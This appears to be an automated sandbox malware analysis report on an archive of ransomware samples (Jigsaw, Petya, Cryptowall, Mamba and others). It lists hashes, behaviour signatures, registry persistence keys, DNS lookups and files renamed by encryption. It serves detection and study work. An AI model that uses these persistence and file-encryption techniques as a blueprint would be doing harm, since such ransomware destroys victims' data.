Malware Analysis Report

2024-09-22 13:07

Sample ID 240630-bcjr6svbkk
Target bc41543926dda3762ae39e35aba7a813_JaffaCakes118
SHA256 f255227fd45316c4681085f39e6da2f509af851f8cc2d2a84ea99c06b935ffe6
Tags
bootkit persistence jigsaw ransomware spyware stealer execution upx mimikatz cerber discovery evasion privilege_escalation locky defense_evasion impact
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f255227fd45316c4681085f39e6da2f509af851f8cc2d2a84ea99c06b935ffe6

Threat Level: Known bad

The file bc41543926dda3762ae39e35aba7a813_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

bootkit persistence jigsaw ransomware spyware stealer execution upx mimikatz cerber discovery evasion privilege_escalation locky defense_evasion impact

Locky

Mimikatz

Jigsaw Ransomware

Suspicious use of NtCreateProcessExOtherParentProcess

Cerber

Renames multiple (3792) files with added filename extension

mimikatz is an open source tool to dump credentials on Windows

Renames multiple (2015) files with added filename extension

Deletes shadow copies

Contacts a large (1107) amount of remote hosts

Modifies Windows Firewall

Blocklisted process makes network request

Contacts a large (1095) amount of remote hosts

Boot or Logon Autostart Execution: Port Monitors

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

UPX packed file

Deletes itself

Drops desktop.ini file(s)

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Looks up external IP address via web service

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Command and Scripting Interpreter: JavaScript

Program crash

Unsigned PE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Checks processor information in registry

Opens file in notepad (likely ransom note)

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: MapViewOfSection

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Kills process with taskkill

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

Uses Volume Shadow Copy service COM API

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious use of UnmapMainImage

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-30 01:00

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1679s

Max time network

1694s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"

Network

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240508-en

Max time kernel

0s

Max time network

1s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Signatures

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe"

Network

N/A

Files

memory/1728-1-0x0000000000400000-0x000000000043F000-memory.dmp

memory/1728-0-0x000000000041A000-0x0000000000427000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1385s

Max time network

1178s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cryptowall\cryptowall.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1628 -ip 1628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 476

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 105.246.116.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1354s

Max time network

1178s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Renames multiple (3792) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Port Monitors

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Ports C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\IPP C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon\Ports C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint\OfflinePorts C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port C:\Windows\System32\spoolsv.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports C:\Windows\System32\spoolsv.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\FreeCell.Medium.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d1.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-black_scale-80.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-48_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxAccountsStoreLogo.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsfin.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-96_altform-colorize.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_LogoSmall.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\plugin.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StoreLogo.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-400.HCWhite.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalSplashScreen.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\word.x-none.msi.16.x-none.vreg.dat C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-256_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Light\Default.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\images\PaySplashScreen.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-20_altform-unplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionMedTile.scale-150.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-40_altform-lightunplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\13.jpg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lv_get.svg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Scientific.targetsize-32_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\192.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\ExploreButtonGradientTenfoot.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\faf-main.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-down.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\tinytile.targetsize-256_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-60_altform-lightunplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Dark.scale-150.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-36_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Retail\NinjaCatOnDragon.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SmallTile.scale-100_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageWideTile.scale-150.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-us\onenote_whatsnew.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwclassic.dotx C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_tr_135x40.svg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 C:\Windows\System32\spoolsv.exe N/A
